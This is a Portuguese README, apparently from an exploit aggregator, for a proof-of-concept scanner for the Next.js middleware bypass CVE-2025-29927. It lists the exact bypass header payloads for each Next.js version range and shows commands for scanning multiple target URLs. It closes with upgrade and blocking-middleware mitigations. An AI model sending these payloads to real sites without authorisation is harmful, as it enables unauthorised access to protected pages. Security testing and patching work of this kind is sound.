## https://sploitus.com/exploit?id=87BEB4D5-8717-547B-B8F9-30621D5DBA93
# Scanner de Vulnerabilidade Middleware Subrequest do Next.js
Uma ferramenta robusta de prova de conceito (PoC) para detectar a vulnerabilidade de middleware do Next.js (CVE-2025-29927).
## Visão Geral
Esta ferramenta testa uma vulnerabilidade crítica em aplicações Next.js onde o cabeçalho `x-middleware-subrequest` pode ser usado para contornar verificações de segurança implementadas no middleware. O exploit envolve o envio de solicitações HTTP com cabeçalhos maliciosos específicos, variando conforme a versão do Next.js.
## Como Funciona o Exploit
De acordo com a pesquisa, existem diferentes payloads para diferentes versões do Next.js:
1. **Versões anteriores à 12.2**:
```
x-middleware-subrequest: pages/_middleware
```
2. **Versões a partir da 12.2**:
```
x-middleware-subrequest: middleware
```
ou
```
x-middleware-subrequest: src/middleware
```
(se a aplicação usar o diretório src)
3. **Versões mais recentes (como 15.x)**:
```
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```
ou
```
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
```
Nossa PoC testa todos esses payloads automaticamente e reporta qual foi bem-sucedido.
## Funcionalidades
- Teste de um ou múltiplos alvos
- Escaneamento concorrente com multithreading
- Caminhos de requisição personalizáveis
- Teste automático de todos os payloads possíveis
- Saída detalhada e colorida no terminal
- Exportação de resultados em JSON
- Tratamento robusto de erros
- Detecção abrangente de vulnerabilidades
## Requisitos
- Python 3.7+
- Pacotes necessários:
- requests
- colorama
## Instalação
```bash
# Clone o repositório ou baixe os arquivos
# Navegue até o diretório
cd poc-nextjs-2025
# Instale os pacotes necessários
pip install -r requirements.txt
```
## Uso
```bash
python main.py -u https://exemplo.com # Testar uma única URL
python main.py -f alvos.txt # Testar múltiplas URLs de um arquivo
```
### Argumentos de Linha de Comando
| Opção | Descrição |
| ------ | ----------- |
| `-u, --url URL` | URL alvo para escanear |
| `-f, --file ARQUIVO` | Arquivo contendo múltiplas URLs para escanear (uma por linha) |
| `-p, --paths CAMINHOS` | Lista de caminhos para testar separados por vírgula (padrão: caminhos comuns) |
| `-t, --threads N` | Número de threads concorrentes (padrão: 5) |
| `-o, --output ARQUIVO` | Salvar resultados em arquivo JSON |
| `--timeout N` | Tempo limite da requisição em segundos (padrão: 10) |
### Exemplos
```bash
# Escaneamento básico de um único alvo
python main.py -u https://exemplo.com
# Escanear múltiplos alvos com caminhos personalizados
python main.py -f alvos.txt -p /api/users,/admin,/dashboard
# Escanear com maior concorrência e timeout mais longo
python main.py -u https://exemplo.com -t 10 --timeout 15
# Salvar resultados em um arquivo JSON
python main.py -u https://exemplo.com -o resultados_scan.json
```
## Metodologia de Detecção
O scanner funciona através de:
1. Envio de uma requisição normal para o alvo
2. Envio de requisições com diferentes variações do cabeçalho `x-middleware-subrequest` conforme as versões do Next.js
3. Comparação das respostas para identificar indicadores de vulnerabilidade:
- Requisição normal bloqueada (4xx/5xx) mas requisição de exploit permitida (2xx)
- Diferença significativa no conteúdo da resposta
- Indicadores de bypass de autenticação/autorização
## Mitigação
Se você descobrir aplicações vulneráveis, aplique estas mitigações:
- Atualize para as versões 14.2.25 ou 15.2.3 ou posteriores do Next.js
- Implemente um middleware que bloqueie requisições com o cabeçalho `x-middleware-subrequest`
```typescript
export function middleware(request: NextRequest) {
if (request.headers.has('x-middleware-subrequest')) {
return new Response('Unauthorized', { status: 401 });
}
return NextResponse.next();
}
```